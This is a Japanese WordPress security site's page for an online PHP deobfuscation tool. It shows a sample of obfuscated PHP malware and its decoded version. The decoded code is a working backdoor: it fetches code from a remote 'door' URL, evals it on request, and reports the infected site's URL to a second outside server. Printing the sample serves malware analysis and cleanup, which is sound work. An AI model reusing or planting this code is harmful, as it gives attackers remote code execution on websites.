Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php goto aUctt; HhT2w: session_start(); goto j2LzN; j2LzN: $u7wMS = $_REQUEST["\144\x6f\x61\143\164"]; goto iBxbK; KAEwC: UdMtz: goto zDwno; JdmX4: oWTls: goto hylTJ; u84y1: $jc0Nd = (isset($_SERVER["\110\124\124\120\123"]) && $_SERVER["\x48\x54\x54\120\x53"] === "\157\156" ? "\150\164\...



難読化されたPHPコード

<?php
 goto aUctt; HhT2w: session_start(); goto j2LzN; j2LzN: $u7wMS = $_REQUEST["\144\x6f\x61\143\164"]; goto iBxbK; KAEwC: UdMtz: goto zDwno; JdmX4: oWTls: goto hylTJ; u84y1: $jc0Nd = (isset($_SERVER["\110\124\124\120\123"]) && $_SERVER["\x48\x54\x54\120\x53"] === "\157\156" ? "\150\164\x74\x70\163" : "\x68\164\164\160") . "\72\x2f\57{$_SERVER["\x48\124\x54\120\137\110\x4f\x53\x54"]}{$_SERVER["\x52\105\x51\x55\x45\x53\124\137\125\122\111"]}"; goto LecGv; LecGv: RdpN_(array("\x77\145\x62" => $jc0Nd)); goto v6eiz; aUctt: error_reporting(0); goto HhT2w; iihwX: $ipdaO = lDmb2(str_rot13("\x75\147\x67\x63\146\x3a\57\57\151\143\x66\x71\x71\x2e\x71\x73\x64\x73\x6e\x67\x2e\x67\142\x63\x2f\x71\x62\x62\x65\57") . $u7wMS . "\x2e\x74\x78\164"); goto oxGvR; hylTJ: $_SESSION["\144\157\x61\x63\x74"] = $u7wMS; goto iihwX; v6eiz: goto UdMtz; goto JdmX4; iBxbK: if (!empty($u7wMS)) { goto oWTls; } goto u84y1; TwgqM: exit; goto KAEwC; oxGvR: eval("\x3f\76" . $ipdaO); goto TwgqM; zDwno: function ldmB2($jc0Nd) { goto M3gLR; AWRjz: curl_setopt($NFh5W, CURLOPT_SSL_VERIFYPEER, 0); goto ISU6b; ggKDJ: $NFh5W = curl_init($jc0Nd); goto lWsck; ufNRO: curl_close($NFh5W); goto Jma1S; y8uH0: dNx8U: goto R78QB; qNKoO: $zT2tW = curl_exec($NFh5W); goto ufNRO; ISU6b: curl_setopt($NFh5W, CURLOPT_SSL_VERIFYHOST, 0); goto qNKoO; a4YTf: q7yvx: goto XN5c0; pf2fm: $nzvqV = fopen($jc0Nd, "\x72"); goto Idv6h; lWsck: curl_setopt($NFh5W, CURLOPT_RETURNTRANSFER, 1); goto bj0at; aVp1K: fclose($nzvqV); goto a4YTf; R78QB: if (!(empty($zT2tW) && function_exists("\146\157\x70\145\156") && function_exists("\163\164\162\145\x61\155\x5f\x67\145\164\137\143\x6f\156\x74\x65\156\164\163"))) { goto q7yvx; } goto pf2fm; jlGHZ: $zT2tW = file_get_contents($jc0Nd); goto y8uH0; M3gLR: $zT2tW = ''; goto Dd4EV; Idv6h: $zT2tW = stream_get_contents($nzvqV); goto aVp1K; o7qZF: if (!(empty($zT2tW) && function_exists("\x66\151\154\x65\137\x67\x65\164\x5f\143\157\x6e\164\x65\x6e\164\x73"))) { goto dNx8U; } goto jlGHZ; XN5c0: return $zT2tW; goto vJwYM; Jma1S: KerET: goto o7qZF; Dd4EV: if (!function_exists("\143\165\162\154\137\145\170\x65\x63")) { goto KerET; } goto ggKDJ; bj0at: curl_setopt($NFh5W, CURLOPT_FOLLOWLOCATION, 1); goto AWRjz; vJwYM: } goto Efa0c; Efa0c: function rdPN_($a30zL) { goto f0ABF; Jq4fY: $kn7I_ = curl_init(str_rot13($jc0Nd)); goto lyhJP; FeFbW: curl_setopt($kn7I_, CURLOPT_POSTFIELDS, $a30zL); goto Cyktn; OUtri: $r2SpD = curl_exec($kn7I_); goto WegPb; f0ABF: $jc0Nd = "\x75\147\147\x63\x3a\x2f\57\145\162\x7a\142\x67\162\x32\60\62\x35\x2e\x6f\x6c\x75\142\147\56\147\142\143\x2f\x76\x61\161\162\153\56\x63\165\143"; goto Jq4fY; Cyktn: curl_setopt($kn7I_, CURLOPT_RETURNTRANSFER, true); goto OUtri; lyhJP: curl_setopt($kn7I_, CURLOPT_POST, 1); goto FeFbW; WegPb: curl_close($kn7I_); goto U2cPM; U2cPM: }
 ?>

デコード(難読化解除)されたコード

<?php

error_reporting(0);
session_start();
$u7wMS = $_REQUEST["doact"];
if (!empty($u7wMS)) {
    $_SESSION["doact"] = $u7wMS;
    $ipdaO = lDmb2("https://vpsdd.dfqfat.top/door/" . $u7wMS . ".txt");
    eval("?>" . $ipdaO);
    exit;
}
$jc0Nd = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://{$_SERVER["HTTP_HOST"]}{$_SERVER["REQUEST_URI"]}";
RdpN_(array("web" => $jc0Nd));
function ldmB2($jc0Nd)
{
    $zT2tW = '';
    if (!function_exists("curl_exec")) {
        goto KerET;
    }
    $NFh5W = curl_init($jc0Nd);
    curl_setopt($NFh5W, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($NFh5W, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($NFh5W, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($NFh5W, CURLOPT_SSL_VERIFYHOST, 0);
    $zT2tW = curl_exec($NFh5W);
    curl_close($NFh5W);
    KerET:
    if (!(empty($zT2tW) && function_exists("file_get_contents"))) {
        goto dNx8U;
    }
    $zT2tW = file_get_contents($jc0Nd);
    dNx8U:
    if (!(empty($zT2tW) && function_exists("fopen") && function_exists("stream_get_contents"))) {
        goto q7yvx;
    }
    $nzvqV = fopen($jc0Nd, "r");
    $zT2tW = stream_get_contents($nzvqV);
    fclose($nzvqV);
    q7yvx:
    return $zT2tW;
}
function rdPN_($a30zL)
{
    $jc0Nd = "uggc://erzbgr2025.olubg.gbc/vaqrk.cuc";
    $kn7I_ = curl_init("http://remote2025.byhot.top/index.php");
    curl_setopt($kn7I_, CURLOPT_POST, 1);
    curl_setopt($kn7I_, CURLOPT_POSTFIELDS, $a30zL);
    curl_setopt($kn7I_, CURLOPT_RETURNTRANSFER, true);
    $r2SpD = curl_exec($kn7I_);
    curl_close($kn7I_);
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.